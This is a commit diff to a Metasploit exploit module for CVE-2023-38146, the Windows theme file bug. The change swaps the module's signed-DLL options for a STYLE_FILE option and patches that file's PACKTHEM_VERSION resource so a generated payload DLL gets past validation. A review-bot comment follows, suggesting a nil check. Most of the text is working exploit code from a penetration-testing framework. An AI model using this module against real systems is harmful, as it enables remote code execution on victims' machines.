Bring in zerosteiner's PACKME_VERSION edit
7fafab9680
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DisclosureDate' => '2023-09-13',
|
'DisclosureDate' => '2023-09-13',
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'gabe_k', # Discovery/PoC
|
'gabe_k', # Discovery/PoC
|
||||||
'bwatters-r7' # msf exploit
|
'bwatters-r7', # msf exploit
|
||||||
|
'Spencer McIntyre' # msf exploit
|
||||||
],
|
],
|
||||||
'References' => [
|
'References' => [
|
||||||
['CVE', '2023-38146'],
|
['CVE', '2023-38146'],
|
||||||
|
@ -39,15 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Stability' => [CRASH_SAFE],
|
'Stability' => [CRASH_SAFE],
|
||||||
'Reliability' => [REPEATABLE_SESSION],
|
'Reliability' => [REPEATABLE_SESSION],
|
||||||
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
|
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
|
||||||
}
|
},
|
||||||
|
'DefaultOptions' => { 'DisablePayloadHandler' => false }
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
|
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
|
||||||
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
|
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
|
||||||
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]),
|
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
|
||||||
OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
|
|
||||||
OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
|
|
||||||
])
|
])
|
||||||
|
|
||||||
deregister_options(
|
deregister_options(
|
||||||
|
@ -69,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def primer
|
def primer
|
||||||
legit_dll = File.binread(datastore['MS_SIGNED_DLL'])
|
legit_dll = File.binread(datastore['STYLE_FILE'])
|
||||||
payload_dll = generate_payload_dll
|
payload_dll = generate_payload_dll
|
||||||
max_length = [payload_dll.length, legit_dll.length].max
|
max_length = [payload_dll.length, legit_dll.length].max
|
||||||
# make sure that the lengths are the same by padding the smaller to the length of the larger
|
# make sure that the lengths are the same by padding the smaller to the length of the larger
|
||||||
|
@ -99,7 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
def get_file_contents(client:)
|
def get_file_contents(client:)
|
||||||
print_status("Sending file to #{client.peerhost}")
|
print_status("Sending file to #{client.peerhost}")
|
||||||
File.binread(datastore['MS_VERSION_FILE'])
|
pe_raw = File.binread(datastore['STYLE_FILE'])
|
||||||
|
pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
|
||||||
|
version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
|
||||||
|
pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
|
||||||
end
|
end
|
||||||
|
|
||||||
def make_theme
|
def make_theme
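Review bot: `pe.resources['/PACKTHEM_VERSION/0/0']` on the new line in get_file_contents is dereferenced with `.rva` without a nil check, so a STYLE_FILE that parses as a PE but lacks that resource (or, if `pe.resources` itself is nil, any PE without a resource directory) raises NoMethodError inside the request handler after the target has already connected, instead of failing as a configuration error up front. The STYLE_FILE option only validates the filename suffix, so nothing earlier in the module guarantees the resource exists. I would split the lookup and fail cleanly: `resource = pe.resources && pe.resources['/PACKTHEM_VERSION/0/0']`, `fail_with(Failure::BadConfig, "#{datastore['STYLE_FILE']} has no PACKTHEM_VERSION resource") if resource.nil?`, then `version_offset = pe.rva_to_file_offset(resource.rva)`; performing the same parse once in `exploit` (outside this hunk) before the server starts would surface the problem even earlier. The bare `999` also deserves a one-line comment naming what that version value triggers on the target, since nothing in the hunk says why this particular value is patched into the resource. The commit title's "PACKME_VERSION" does not match the "PACKTHEM_VERSION" resource name the code actually uses.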
|
||||||